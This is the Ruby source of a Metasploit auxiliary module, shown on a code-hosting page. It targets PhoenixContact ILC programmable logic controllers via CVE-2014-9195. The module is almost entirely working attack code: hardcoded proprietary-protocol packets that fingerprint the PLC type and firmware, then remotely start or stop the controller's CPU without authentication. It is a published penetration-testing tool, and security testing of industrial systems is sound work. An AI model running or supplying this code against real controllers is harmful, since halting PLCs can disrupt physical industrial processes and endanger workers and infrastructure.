Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/auxiliary/admin/scada/phoenix_command.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Tcp7include Rex::Socket::Tcp89def initialize(info = {})10super(update_info(info,11'Name' => 'PhoenixContact PLC Remote START/STOP Command',12'Version' => '1',13'Description' => %q{14PhoenixContact Programmable Logic Controllers are built upon a variant of15ProConOS. Communicating using a proprietary protocol over ports TCP/196216and TCP/41100 or TCP/20547.17It allows a remote user to read out the PLC Type, Firmware and18Build number on port TCP/1962.19And also to read out the CPU State (Running or Stopped) AND start20or stop the CPU on port TCP/41100 (confirmed ILC 15x and 17x series)21or on port TCP/20547 (confirmed ILC 39x series)22},23'Author' => 'Tijl Deneut <tijl.deneut[at]howest.be>',24'License' => MSF_LICENSE,25'References' =>26[27[ 'URL', 'https://github.com/tijldeneut/ICSSecurityScripts' ],28[ 'CVE', '2014-9195']29],30'DisclosureDate' => '2015-05-20'))31register_options(32[33OptEnum.new('ACTION', [true, 'PLC CPU action, REV means reverse current CPU state', 'NOOP',34[35'STOP',36'START',37'REV',38'NOOP'39]]),40OptPort.new('RINFOPORT', [true, 'Set info port', 1962 ]),41OptPort.new('RPORT', [false, 'Set action port, will try autodetect when not set' ])42], self.class43)44end4546# Here comes the code, hang on to your pants47def bin_to_hex(s)48s.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join49end5051def hex_to_bin(s)52s.scan(/../).map { |x| x.hex.chr }.join53end5455def send_recv_once(data)56buf = ''57begin58sock.put(data)59buf = sock.get_once || ''60rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e61elog(e)62end6364bin_to_hex(buf)65end6667def get_info(rhost, rport)68connect(true, 'RHOST' => rhost, 'RPORT' => rport)69data = send_recv_once("\x01\x01\x00\x1a\x00^\x00\x00\x00\x00\x00\x03\x00\x0cIBETH01N0_M\x00")70if data.nil? || data.length < 3671print_error("Could not obtain information on this device")72disconnect73return "UNKNOWN"74end75code = data[34..35]76send_recv_once("\x01\x05\x00\x16\x00\x5f\x00\x00\x08\xef\x00" + hex_to_bin(code) + "\x00\x00\x00\x22\x00\x04\x02\x95\x00\x00")77data = send_recv_once("\x01\x06\x00\x0e\x00\x61\x00\x00\x88\x11\x00" + hex_to_bin(code) + "\x04\x00")78disconnect79if data.nil? || data.length < 20080print_error("Could not obtain information on this device")81return "UNKNOWN"82end83plctype = hex_to_bin(data[60..99])84print_status("PLC Type = " + plctype)85print_status("Firmware = " + hex_to_bin(data[132..139]))86print_status("Build = " + hex_to_bin(data[158..174]) + " " + hex_to_bin(data[182..199]))87print_status('------------------------------------')88plctype89end9091def init_phase192send_recv_once("\x01\x00\x00\x00\x00\x00/\x00\x00\x00\x00\x00\x00\x00\xcf\xffAde.Remoting.Services.IProConOSControlService2\x00")93send_recv_once("\x01\x00\x00\x00\x00\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00Ade.Remoting.Services.IProConOSControlService\x00")94send_recv_once("\x01\x00\x00\x00\x00\x00)\x00\x00\x00\x00\x00\x00\x00\x00\x00Ade.Remoting.Services.IDataAccessService\x00")95send_recv_once("\x01\x00\x00\x00\x00\x00*\x00\x00\x00\x00\x00\x00\x00\xd4\xffAde.Remoting.Services.IDeviceInfoService2\x00")96send_recv_once("\x01\x00\x00\x00\x00\x00)\x00\x00\x00\x00\x00\x00\x00\x00\x00Ade.Remoting.Services.IDeviceInfoService\x00")97send_recv_once("\x01\x00\x00\x00\x00\x00%\x00\x00\x00\x00\x00\x00\x00\xd9\xffAde.Remoting.Services.IForceService2\x00")98send_recv_once("\x01\x00\x00\x00\x00\x00$\x00\x00\x00\x00\x00\x00\x00\x00\x00Ade.Remoting.Services.IForceService\x00")99send_recv_once("\x01\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\xce\xffAde.Remoting.Services.ISimpleFileAccessService3\x00")100send_recv_once("\x01\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\x00\x00Ade.Remoting.Services.ISimpleFileAccessService2\x00")101send_recv_once("\x01\x00\x00\x00\x00\x00*\x00\x00\x00\x00\x00\x00\x00\xd4\xffAde.Remoting.Services.IDeviceInfoService2\x00")102send_recv_once("\x01\x00\x00\x00\x00\x00)\x00\x00\x00\x00\x00\x00\x00\x00\x00Ade.Remoting.Services.IDeviceInfoService\x00")103send_recv_once("\x01\x00\x00\x00\x00\x00*\x00\x00\x00\x00\x00\x00\x00\xd4\xffAde.Remoting.Services.IDataAccessService3\x00")104send_recv_once("\x01\x00\x00\x00\x00\x00)\x00\x00\x00\x00\x00\x00\x00\x00\x00Ade.Remoting.Services.IDataAccessService\x00")105send_recv_once("\x01\x00\x00\x00\x00\x00*\x00\x00\x00\x00\x00\x00\x00\xd4\xffAde.Remoting.Services.IDataAccessService2\x00")106send_recv_once("\x01\x00\x00\x00\x00\x00)\x00\x00\x00\x00\x00\x00\x00\xd5\xffAde.Remoting.Services.IBreakpointService\x00")107send_recv_once("\x01\x00\x00\x00\x00\x00(\x00\x00\x00\x00\x00\x00\x00\xd6\xffAde.Remoting.Services.ICallstackService\x00")108send_recv_once("\x01\x00\x00\x00\x00\x00%\x00\x00\x00\x00\x00\x00\x00\x00\x00Ade.Remoting.Services.IDebugService2\x00")109send_recv_once("\x01\x00\x00\x00\x00\x00/\x00\x00\x00\x00\x00\x00\x00\xcf\xffAde.Remoting.Services.IProConOSControlService2\x00")110send_recv_once("\x01\x00\x00\x00\x00\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00Ade.Remoting.Services.IProConOSControlService\x00")111send_recv_once("\x01\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\xce\xffAde.Remoting.Services.ISimpleFileAccessService3\x00")112send_recv_once("\x01\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\x00\x00Ade.Remoting.Services.ISimpleFileAccessService2\x00")113send_recv_once("\x01\x00\x02\x00\x00\x00\x0e\x00\x03\x00\x03\x00\x00\x00\x00\x00\x05\x00\x00\x00\x12@\x13@\x13\x00\x11@\x12\x00")114end115116def init_phase2117send_recv_once("\xcc\x01\x00\r\xc0\x01\x00\x00\xd5\x17")118send_recv_once("\xcc\x01\x00\x0b@\x02\x00\x00G\xee")119send_recv_once("\xcc\x01\x00[@\x03\x1c\x00\x01\x00\x00\x00\x1c\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd7\x9a")120send_recv_once("\xcc\x01\x00[@\x04\x1c\x00\x01\x00\x00\x00\x1c\x00\x00\x00\x01\x00\x00\x00\x04\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xeaC")121send_recv_once("\xcc\x01\x00\x06@\x05\x00\x006\x1e")122send_recv_once("\xcc\x01\x00\x07@\x06\x10\x00&u\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc6\x82")123end124125def get_state1(data)126if data[48..49] == '03'127state = 'RUN'128elsif data[48..49] == '07'129state = 'STOP'130elsif data[49..49] == '00'131state = 'ON'132else133print_error('CPU State not detected, full result is ' + data)134return135end136state137end138139def get_state2(data)140if data[16..17] == '04'141state = 'STOP'142elsif data[16..17] == '02'143state = 'RUN'144else145print_error('CPU State not detected, full result is ' + data)146return147end148state149end150151def get_cpu(rhost, rport, devicetype)152connect(true, 'RHOST' => rhost, 'RPORT' => rport)153state = 'unknown'154if devicetype == '15x'155init_phase1156## KeepAlive packet157send_recv_once("\x01\x00\x02\x00\x00\x00\x1c\x00\x03\x00\x03\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x07\x00\x05\x00\x06\x00\x08\x00\x10\x00\x02\x00\x11\x00\x0e\x00\x0f\x00\r\x00\x16@\x16\x00")158## Query packet159data = send_recv_once("\x01\x00\x02\x00\x00\x00\x08\x00\x03\x00\x03\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x40\x0b\x40")160state = get_state1(data)161elsif devicetype == '39x'162init_phase2163data = send_recv_once("\xcc\x01\x00\x0f@\x07\x00\x00\xea\xfa")164state = get_state2(data)165end166disconnect167print_status('CPU Mode = ' + state)168state169end170171def set_cpu(rhost, rport, action, state, devicetype)172connect(true, 'RHOST' => rhost, 'RPORT' => rport)173if devicetype == '15x'174init_phase1 ## Several packets (21)175send_recv_once("\x01\x00\x02\x00\x00\x00\x1c\x00\x03\x00\x03\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x07\x00\x05\x00\x06\x00\x08\x00\x10\x00\x02\x00\x11\x00\x0e\x00\x0f\x00\r\x00\x16@\x16\x00")176if action == 'START' || (action == 'REV' && state == 'STOP')177print_status('--> Sending COLD start now')178send_recv_once("\x01\x00\x02\x00\x00\x00\x02\x00\x01\x00\x06\x00\x00\x00\x00\x00\x01\x00")179else180print_status('--> Sending STOP now')181send_recv_once("\x01\x00\x02\x00\x00\x00\x00\x00\x01\x00\x07\x00\x00\x00\x00\x00")182end183elsif devicetype == '39x'184init_phase2 ## Several packets (6)185if action == 'START' || (action == 'REV' && state == 'STOP')186print_status('--> Sending COLD start now')187send_recv_once("\xcc\x01\x00\x04\x40\x0e\x00\x00\x18\x21")188else189print_status('--> Sending STOP now')190send_recv_once("\xcc\x01\x00\x01\x40\x0e\x00\x00\x4c\x07")191end192else193print_error('Unknown device type')194return195end196sleep(1) ## It takes a second for a PLC to start197get_cpu(rhost, rport, devicetype)198disconnect199end200201def run202rhost = datastore['RHOST']203action = datastore['ACTION']204ractionport = datastore['RPORT']205206device = get_info(rhost, datastore['RINFOPORT'])207208if device.start_with?('ILC 15', 'ILC 17')209devicetype = '15x'210print_status('--> Detected 15x/17x series, getting current CPU state:')211ractionport.nil? ? (rport = 41100) : (rport = ractionport)212elsif device.start_with?('ILC 39')213devicetype = '39x'214print_status('--> Detected 39x series, getting current CPU state:')215ractionport.nil? ? (rport = 20547) : (rport = ractionport)216else217print_error('Only ILC and (some) RFC devices are supported.')218return219end220221state = get_cpu(rhost, rport, devicetype)222print_status('------------------------------------')223224if action == "NOOP"225print_status("--> No action specified (#{action}), stopping here")226return227end228229set_cpu(rhost, rport, action, state, devicetype)230end231end232233234